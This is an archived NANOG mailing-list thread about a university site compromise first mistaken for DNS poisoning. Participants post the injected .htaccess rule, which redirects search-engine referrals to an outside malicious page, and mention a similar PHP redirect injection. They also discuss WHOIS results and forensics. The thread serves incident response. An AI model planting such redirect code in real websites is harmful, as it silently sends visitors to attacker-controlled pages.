Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

[Kyle Creyts]

and upon further investigation, it seems like there might be an actual
organization using a host with that IP...

http://www.robtex.com/dns/chatwithus.net.html#shared

On Tue, Jul 3, 2012 at 2:27 PM, Kyle Creyts  wrote:

> it actually appears that skywire has a suballocation for that block,
> http://www.robtex.com/ip/208.88.11.111.html#whois
>
> #
> # The following results may also be obtained via:
> # http://whois.arin.net <http://www.robtex.com/dns/whois.arin.net.html>
> /rest/nets;q=208.88.11.111 <http://www.robtex.com/ip/208.88.11.111.html>
> ?showDetails=true&showARIN=false&ext=netref2
> #
>
> American West Internet SKYWIRE-SG (NET-208-88-11-0-1) 
> 208.88.11.0<http://www.robtex.com/ip/208.88.11.0.html>
>  - 208.88.11.255 <http://www.robtex.com/ip/208.88.11.255.html>
>
> Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 
> 208.88.8.0<http://www.robtex.com/ip/208.88.8.0.html>
>  - 208.88.11.255 <http://www.robtex.com/ip/208.88.11.255.html>
>
>  #
> # ARIN WHOIS data and services are subject to the Terms of Use
> # available at: 
> https://www.arin.net<http://www.robtex.com/dns/www.arin.net.html>
> /whois_tou.html
> #
>
> On Wed, Jun 27, 2012 at 12:56 PM, Matthew Black 
> wrote:
>
>> By the way, FTP access originated from: 208.88.11.111
>>
>> Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 -
>> 208.88.11.255
>>
>> NetRange:   208.88.8.0 - 208.88.11.255
>> CIDR:   208.88.8.0/22
>> OriginAS:   AS40603
>> NetName:SKYWIRE-SG
>> NetHandle:  NET-208-88-8-0-1
>> Parent: NET-208-0-0-0-0
>> NetType:Direct Allocation
>> Comment:http://www.skywireusa.com
>> RegDate:2008-03-04
>> Updated:2012-03-02
>> Ref:http://whois.arin.net/rest/net/NET-208-88-8-0-1
>>
>> OrgName:Sky Wire Communications
>> OrgId:  DGSU
>> Address:946 W Sunset Blvd Ste L
>> City:   St George
>> StateProv:  UT
>> PostalCode: 84770
>> Country:US
>> RegDate:2007-12-04
>> Updated:2009-11-04
>> Ref:http://whois.arin.net/rest/org/DGSU
>>
>>
>> Who We Are
>> Skywire Communications is the Leading High Speed Internet Provider in
>> Southern Utah. Offering Service in St George, Washington, Santa Clara,
>> Ivins, Cedar City, and Enoch. It is the goal of SkyWire Communications to
>> provide high speed internet access to 100 Percent of Southern Utah. We are
>> located in St George, Utah.
>>
>>
>>
>>
>> matthew black
>> information technology services
>> california state university, long beach
>>
>>
>>
>> -Original Message-
>> From: Matthew Black [mailto:matthew.bl...@csulb.edu]
>> Sent: Wednesday, June 27, 2012 9:52 AM
>> To: 'Jason Hellenthal'; Arturo Servin
>> Cc: nanog@nanog.org
>> Subject: RE: No DNS poisoning at Google (in case of trouble, blame the
>> DNS)
>>
>> Ask and ye shall receive:
>>
>> # more .htaccess (backup copy)
>>
>> #c3284d#
>> 
>> RewriteEngine On
>> RewriteCond %{HTTP_REFERER}
>> ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt
>>
>> avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea
>>
>> rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d
>>
>> ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel
>>
>> and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea
>>
>> rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|
>>
>> jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l
>>
>> ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse
>>
>> arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea
>>
>> rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s
>>
>> uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin
>>

Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

[Kyle Creyts]

it actually appears that skywire has a suballocation for that block,
http://www.robtex.com/ip/208.88.11.111.html#whois

#
# The following results may also be obtained via:
# http://whois.arin.net <http://www.robtex.com/dns/whois.arin.net.html>
/rest/nets;q=208.88.11.111 <http://www.robtex.com/ip/208.88.11.111.html>
?showDetails=true&showARIN=false&ext=netref2
#

American West Internet SKYWIRE-SG (NET-208-88-11-0-1)
208.88.11.0<http://www.robtex.com/ip/208.88.11.0.html>
 - 208.88.11.255 <http://www.robtex.com/ip/208.88.11.255.html>
Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1)
208.88.8.0<http://www.robtex.com/ip/208.88.8.0.html>
 - 208.88.11.255 <http://www.robtex.com/ip/208.88.11.255.html>

#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at:
https://www.arin.net<http://www.robtex.com/dns/www.arin.net.html>
/whois_tou.html
#

On Wed, Jun 27, 2012 at 12:56 PM, Matthew Black wrote:

> By the way, FTP access originated from: 208.88.11.111
>
> Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 -
> 208.88.11.255
>
> NetRange:   208.88.8.0 - 208.88.11.255
> CIDR:   208.88.8.0/22
> OriginAS:   AS40603
> NetName:SKYWIRE-SG
> NetHandle:  NET-208-88-8-0-1
> Parent: NET-208-0-0-0-0
> NetType:Direct Allocation
> Comment:http://www.skywireusa.com
> RegDate:2008-03-04
> Updated:2012-03-02
> Ref:http://whois.arin.net/rest/net/NET-208-88-8-0-1
>
> OrgName:Sky Wire Communications
> OrgId:  DGSU
> Address:946 W Sunset Blvd Ste L
> City:   St George
> StateProv:  UT
> PostalCode: 84770
> Country:US
> RegDate:2007-12-04
> Updated:2009-11-04
> Ref:http://whois.arin.net/rest/org/DGSU
>
>
> Who We Are
> Skywire Communications is the Leading High Speed Internet Provider in
> Southern Utah. Offering Service in St George, Washington, Santa Clara,
> Ivins, Cedar City, and Enoch. It is the goal of SkyWire Communications to
> provide high speed internet access to 100 Percent of Southern Utah. We are
> located in St George, Utah.
>
>
>
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
> -Original Message-
> From: Matthew Black [mailto:matthew.bl...@csulb.edu]
> Sent: Wednesday, June 27, 2012 9:52 AM
> To: 'Jason Hellenthal'; Arturo Servin
> Cc: nanog@nanog.org
> Subject: RE: No DNS poisoning at Google (in case of trouble, blame the DNS)
>
> Ask and ye shall receive:
>
> # more .htaccess (backup copy)
>
> #c3284d#
> 
> RewriteEngine On
> RewriteCond %{HTTP_REFERER}
> ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt
>
> avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea
>
> rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d
>
> ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel
>
> and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea
>
> rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|
>
> jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l
>
> ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse
>
> arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea
>
> rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s
>
> uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin
>
> e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|
>
> westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
> RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
> 
> #/c3284d#
>
>   # # #
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
> -Original Message-
> From: Jason Hellenthal [mailto:jhellent...@dataix.net]
> Sent: Wednesday, June 27, 2012 6:26 AM
> To: Arturo Servin
> Cc: nanog@nanog.org
> Subject: Re: No DNS poisoning at Go

Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

[Ken A]

On 6/28/2012 6:05 AM, Tei wrote:


If you use these project that already do 99% of what the customer
need, plus a 120% the customer not need (and perhaps don't want). The
code quality will be normally be good, with **horrible** exceptions.
But sooner or later, (weeks) there will be exploits for this codebase,
to hack the site in horrible ways.  If the customer don't pay
maintenance and dont do the maintenance himself  the code will turn
comically outdated. Hacking the site will be easy for childrens age 5
and high. Maintenance suck.  This option suck.

All options suck.


That's why there are things like mod_security and other application 
level firewalls. After exploits have CVE numbers, so do the fixes to the 
firewalls. And, due to the cost of custom software, and ease of use of 
push button install Wordpress, this isn't likely to change soon.
It would be nice if WP/Joomla/etc force auto-updated by default, at 
least for sec fixes..

Ken
Pacific.Net

Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

[Tei]

On 28 June 2012 14:48, Arturo Servin  wrote:
...
>
>        Think about sql injection, they are not only to specific platforms but 
> to general bad programming practices.

If you are already a good programmer, writing code that is safe
against sql inyections is trivial.  So is not a real problem, and
thats why I don't mention it.   A real problem is one that you can't
avoid by just walking one step to the left.
But I support that you champion it, and I fully agree bad code is
possible and some people do write it. We don't really disagree.



-- 
--
ℱin del ℳensaje.

Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

[Arturo Servin]

On 28 Jun 2012, at 08:05, Tei wrote:

> On 27 June 2012 09:50, Stephane Bortzmeyer  wrote:
>> (specially for a Web site written in
>> PHP)?
>> 
> 
> We software makers have a problem,  when a customer ask for a
> application, often theres a wen project that already do it ( for the
> most part is a round peg on a round hole). So a natural solution is to
> install this project and customize it to his needs (theme, perhaps
> some programming).  The other option is to create a code from scratch
> (perhaps using a framework).
> 
> If you create the code from scratch, it will be safe.  

I would challenge this. This is not true unless you follow very strict 
rules to make your code safe, and even then, you are not completely safe.

> A tree cant get
> a human virus, and a human can't get a tree virus. You are not
> unhackable,  bad practices will byte you on the long term, but you
> don't see exploits made specifically for this custom made code  daily.

Think about sql injection, they are not only to specific platforms but 
to general bad programming practices.



=)

Regards,
as

Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

[Tei]

On 27 June 2012 09:50, Stephane Bortzmeyer  wrote:
>(specially for a Web site written in
> PHP)?
>

We software makers have a problem,  when a customer ask for a
application, often theres a wen project that already do it ( for the
most part is a round peg on a round hole). So a natural solution is to
install this project and customize it to his needs (theme, perhaps
some programming).  The other option is to create a code from scratch
(perhaps using a framework).

If you create the code from scratch, it will be safe.  A tree cant get
a human virus, and a human can't get a tree virus. You are not
unhackable,  bad practices will byte you on the long term, but you
don't see exploits made specifically for this custom made code  daily.
 Too bad, the features the code allow will be few, limited to the
budget to the project.  Programming sucks, and generate code and bugs,
and everybody suffer for it.  This option suck.

If you use these project that already do 99% of what the customer
need, plus a 120% the customer not need (and perhaps don't want). The
code quality will be normally be good, with **horrible** exceptions.
But sooner or later, (weeks) there will be exploits for this codebase,
to hack the site in horrible ways.  If the customer don't pay
maintenance and dont do the maintenance himself  the code will turn
comically outdated. Hacking the site will be easy for childrens age 5
and high. Maintenance suck.  This option suck.

All options suck.

Your browser will call you a idiot if you try to browse with a
outdated version.  But web projects are not this rude on owners. So
you have people browsing forums in Chrome 18, where the forums
software is a version of 2004 ("heavily customized", but this will not
save you).  Then a cracker comes, uses a know exploit from 2008, and
download  1.2 million unhashed passwords.  Where 98% of these
passwords are reused on facebook, twitter, linkedin and gmail.




-- 
--
ℱin del ℳensaje.

Re: DNS poisoning at Google?

[Bryan Irvine]

On Wed, Jun 27, 2012 at 9:48 AM, Matthew Black  wrote:
> Yes, we did that and also noted the username and IP address from where the 
> FTP upload originated.

It came from an FTP upload?  Why I outta ...  ;-)

Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

[AP NANOG]

On 6/27/12 12:51 PM, Matthew Black wrote:

Ask and ye shall receive:

# more .htaccess (backup copy)

#c3284d#

RewriteEngine On
RewriteCond %{HTTP_REFERER} 
^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt
avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea
rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d
ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel
and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea
rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|
jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l
ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse
arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea
rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s
uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin
e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|
westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]

#/c3284d#

   # # #

matthew black
information technology services
california state university, long beach



-Original Message-
From: Jason Hellenthal [mailto:jhellent...@dataix.net]
Sent: Wednesday, June 27, 2012 6:26 AM
To: Arturo Servin
Cc: nanog@nanog.org
Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS)


What would be nice is the to see the contents of the htaccess file
(obviously with sensitive information excluded)

On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:

It was not DNS issue, but it was a clear case on how community-support helped.

Some of us may even learn some new tricks. :)

Regards,
as

Sent from mobile device. Excuse brevity and typos.


On 27 Jun 2012, at 05:07, Daniel Rohan  wrote:


On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer wrote:

What made you think it can be a DNS cache poisoning (a very rare

event, despite what the media say) when there are many much more
realistic possibilities (specially for a Web site written in
PHP)?

What was the evidence pointing to a DNS problem?


It seems likely that he made a mistake in his analysis of the evidence.
Something that could happen to anyone when operating outside of a comfort
zone or having a bad day. Go easy.

-DR

G' did they miss anyone in that list of referers :-)

Thanks for posting!

--

Thank you,

Robert Miller
http://www.armoredpackets.com

Twitter: @arch3angel

RE: No DNS poisoning at Google (in case of trouble, blame the DNS)

[Matthew Black]

By the way, FTP access originated from: 208.88.11.111

Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 - 208.88.11.255

NetRange:   208.88.8.0 - 208.88.11.255
CIDR:   208.88.8.0/22
OriginAS:   AS40603
NetName:SKYWIRE-SG
NetHandle:  NET-208-88-8-0-1
Parent: NET-208-0-0-0-0
NetType:Direct Allocation
Comment:http://www.skywireusa.com
RegDate:2008-03-04
Updated:2012-03-02
Ref:http://whois.arin.net/rest/net/NET-208-88-8-0-1

OrgName:Sky Wire Communications
OrgId:  DGSU
Address:946 W Sunset Blvd Ste L
City:   St George
StateProv:  UT
PostalCode: 84770
Country:US
RegDate:2007-12-04
Updated:2009-11-04
Ref:http://whois.arin.net/rest/org/DGSU


Who We Are
Skywire Communications is the Leading High Speed Internet Provider in Southern 
Utah. Offering Service in St George, Washington, Santa Clara, Ivins, Cedar 
City, and Enoch. It is the goal of SkyWire Communications to provide high speed 
internet access to 100 Percent of Southern Utah. We are located in St George, 
Utah.




matthew black
information technology services
california state university, long beach



-Original Message-
From: Matthew Black [mailto:matthew.bl...@csulb.edu] 
Sent: Wednesday, June 27, 2012 9:52 AM
To: 'Jason Hellenthal'; Arturo Servin
Cc: nanog@nanog.org
Subject: RE: No DNS poisoning at Google (in case of trouble, blame the DNS)

Ask and ye shall receive:

# more .htaccess (backup copy)

#c3284d#

RewriteEngine On
RewriteCond %{HTTP_REFERER} 
^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt
avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea
rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d
ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel
and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea
rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|
jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l
ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse
arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea
rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s
uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin
e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|
westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]

#/c3284d#

  # # #

matthew black
information technology services
california state university, long beach



-Original Message-
From: Jason Hellenthal [mailto:jhellent...@dataix.net] 
Sent: Wednesday, June 27, 2012 6:26 AM
To: Arturo Servin
Cc: nanog@nanog.org
Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS)


What would be nice is the to see the contents of the htaccess file
(obviously with sensitive information excluded)

On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:
> 
> It was not DNS issue, but it was a clear case on how community-support helped.
> 
> Some of us may even learn some new tricks. :)
> 
> Regards,
> as
> 
> Sent from mobile device. Excuse brevity and typos.
> 
> 
> On 27 Jun 2012, at 05:07, Daniel Rohan  wrote:
> 
> > On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer 
> > wrote:
> > 
> > What made you think it can be a DNS cache poisoning (a very rare
> >> event, despite what the media say) when there are many much more
> >> realistic possibilities (specially for a Web site written in
> >> PHP)?
> >> 
> >> What was the evidence pointing to a DNS problem?
> >> 
> > 
> > It seems likely that he made a mistake in his analysis of the evidence.
> > Something that could happen to anyone when operating outside of a comfort
> > zone or having a bad day. Go easy.
> > 
> > -DR
> 

-- 

 - (2^(N-1))

RE: No DNS poisoning at Google (in case of trouble, blame the DNS)

[Matthew Black]

Ask and ye shall receive:

# more .htaccess (backup copy)

#c3284d#

RewriteEngine On
RewriteCond %{HTTP_REFERER} 
^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt
avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea
rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d
ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel
and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea
rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|
jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l
ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse
arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea
rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s
uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin
e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|
westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]

#/c3284d#

  # # #

matthew black
information technology services
california state university, long beach



-Original Message-
From: Jason Hellenthal [mailto:jhellent...@dataix.net] 
Sent: Wednesday, June 27, 2012 6:26 AM
To: Arturo Servin
Cc: nanog@nanog.org
Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS)


What would be nice is the to see the contents of the htaccess file
(obviously with sensitive information excluded)

On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:
> 
> It was not DNS issue, but it was a clear case on how community-support helped.
> 
> Some of us may even learn some new tricks. :)
> 
> Regards,
> as
> 
> Sent from mobile device. Excuse brevity and typos.
> 
> 
> On 27 Jun 2012, at 05:07, Daniel Rohan  wrote:
> 
> > On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer 
> > wrote:
> > 
> > What made you think it can be a DNS cache poisoning (a very rare
> >> event, despite what the media say) when there are many much more
> >> realistic possibilities (specially for a Web site written in
> >> PHP)?
> >> 
> >> What was the evidence pointing to a DNS problem?
> >> 
> > 
> > It seems likely that he made a mistake in his analysis of the evidence.
> > Something that could happen to anyone when operating outside of a comfort
> > zone or having a bad day. Go easy.
> > 
> > -DR
> 

-- 

 - (2^(N-1))

RE: DNS poisoning at Google?

[Matthew Black]

Yes, we did that and also noted the username and IP address from where the FTP 
upload originated.

matthew black
information technology services
california state university, long beach



-Original Message-
From: Michael J Wise [mailto:mjw...@kapu.net] 
Sent: Wednesday, June 27, 2012 12:37 AM
To: nanog@nanog.org
Subject: Re: DNS poisoning at Google?


On Jun 27, 2012, at 12:06 AM, Matthew Black wrote:

> We found the aberrant .htaccess file and have removed it. What a mess!


Trusting you carefully noted the date/time stamp before removing it, as that's 
an important bit of forensics.

Aloha,
Michael.
-- 
"Please have your Internet License 
 and Usenet Registration handy..."

Re: DNS poisoning at Google?

[AP NANOG]

This may not help Matt now, but I just came across this today and 
believe it may help others who have to deal with incidents:


http://cert.societegenerale.com/en/publications.html --> "IRM (Incident 
Response Methodologies)"


If you changed the file contents before noting the  created date, 
modified date, etc. then begin looking at your backups.  This date will 
then help you track down the log entries and finally lead you to the 
root cause.


Also, if possible, please post the culprit code that caused this, 
exif'ing the sensitive data of course :-)


--

Thank you,

Robert Miller
http://www.armoredpackets.com

Twitter: @arch3angel

On 6/27/12 7:50 AM, TR Shaw wrote:

On Jun 27, 2012, at 3:36 AM, Michael J Wise wrote:


On Jun 27, 2012, at 12:06 AM, Matthew Black wrote:


We found the aberrant .htaccess file and have removed it. What a mess!


Trusting you carefully noted the date/time stamp before removing it, as that's 
an important bit of forensics.

And done forget there is a trail on that file on your backups.

Tom

Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

[Ryan Rawdon]

On Jun 27, 2012, at 10:10 AM, Ryan Rawdon wrote:

> 
> 
> On Jun 27, 2012, at 9:26 AM, Jason Hellenthal wrote:
> 
>> 
>> What would be nice is the to see the contents of the htaccess file
>> (obviously with sensitive information excluded)
> 
> 
> I cleaned up compromises similar to this in a customer site fairly recently.  
> In our case it was the same exact behavior but was php injected into their 
> application, instead of .htaccess.  I do not recall what the original 
> compromise vector was, it was something in the customer's custom application 
> which they resolved.
> 
> It looked like the malware did a find and replace for  with:
> 
> 




http://r.u13.net/permatemp/forefront.png

My message may have gotten caught as spam/malicious by filters.  Not sure if it 
caught the base64 or plaintext so I snipped both.  You can view my original 
message in the archives at 
http://mailman.nanog.org/pipermail/nanog/2012-June/049612.html



> 
> 
> 
> (where brugge.osa.pl was the destination for the redirects in the compromise 
> of this customer site)
> 
> 
> 
>> 
>> On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:
>>> 
 
>>> 
>> 
>> -- 
>> 
>> - (2^(N-1))
>> 
> 
> 

Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

[Ryan Rawdon]

On Jun 27, 2012, at 9:26 AM, Jason Hellenthal wrote:

> 
> What would be nice is the to see the contents of the htaccess file
> (obviously with sensitive information excluded)


I cleaned up compromises similar to this in a customer site fairly recently.  
In our case it was the same exact behavior but was php injected into their 
application, instead of .htaccess.  I do not recall what the original 
compromise vector was, it was something in the customer's custom application 
which they resolved.

It looked like the malware did a find and replace for http://brugge.osa.pl/";);
exit();
}
}
}
}

(where brugge.osa.pl was the destination for the redirects in the compromise of 
this customer site)



> 
> On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:
>> 
>>> 
>> 
> 
> -- 
> 
> - (2^(N-1))
> 

Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

[Jason Hellenthal]

What would be nice is the to see the contents of the htaccess file
(obviously with sensitive information excluded)

On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:
> 
> It was not DNS issue, but it was a clear case on how community-support helped.
> 
> Some of us may even learn some new tricks. :)
> 
> Regards,
> as
> 
> Sent from mobile device. Excuse brevity and typos.
> 
> 
> On 27 Jun 2012, at 05:07, Daniel Rohan  wrote:
> 
> > On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer 
> > wrote:
> > 
> > What made you think it can be a DNS cache poisoning (a very rare
> >> event, despite what the media say) when there are many much more
> >> realistic possibilities (specially for a Web site written in
> >> PHP)?
> >> 
> >> What was the evidence pointing to a DNS problem?
> >> 
> > 
> > It seems likely that he made a mistake in his analysis of the evidence.
> > Something that could happen to anyone when operating outside of a comfort
> > zone or having a bad day. Go easy.
> > 
> > -DR
> 

-- 

 - (2^(N-1))

Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

[Arturo Servin]

It was not DNS issue, but it was a clear case on how community-support helped.

Some of us may even learn some new tricks. :)

Regards,
as

Sent from mobile device. Excuse brevity and typos.


On 27 Jun 2012, at 05:07, Daniel Rohan  wrote:

> On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer 
> wrote:
> 
> What made you think it can be a DNS cache poisoning (a very rare
>> event, despite what the media say) when there are many much more
>> realistic possibilities (specially for a Web site written in
>> PHP)?
>> 
>> What was the evidence pointing to a DNS problem?
>> 
> 
> It seems likely that he made a mistake in his analysis of the evidence.
> Something that could happen to anyone when operating outside of a comfort
> zone or having a bad day. Go easy.
> 
> -DR

Re: DNS poisoning at Google?

[TR Shaw]

On Jun 27, 2012, at 3:36 AM, Michael J Wise wrote:

> 
> On Jun 27, 2012, at 12:06 AM, Matthew Black wrote:
> 
>> We found the aberrant .htaccess file and have removed it. What a mess!
> 
> 
> Trusting you carefully noted the date/time stamp before removing it, as 
> that's an important bit of forensics.

And done forget there is a trail on that file on your backups.

Tom

Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

[Daniel Rohan]

On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer wrote:

What made you think it can be a DNS cache poisoning (a very rare
> event, despite what the media say) when there are many much more
> realistic possibilities (specially for a Web site written in
> PHP)?
>
> What was the evidence pointing to a DNS problem?
>

It seems likely that he made a mistake in his analysis of the evidence.
Something that could happen to anyone when operating outside of a comfort
zone or having a bad day. Go easy.

-DR

No DNS poisoning at Google (in case of trouble, blame the DNS)

[Stephane Bortzmeyer]

On Wed, Jun 27, 2012 at 03:53:17AM +,
 Matthew Black  wrote 
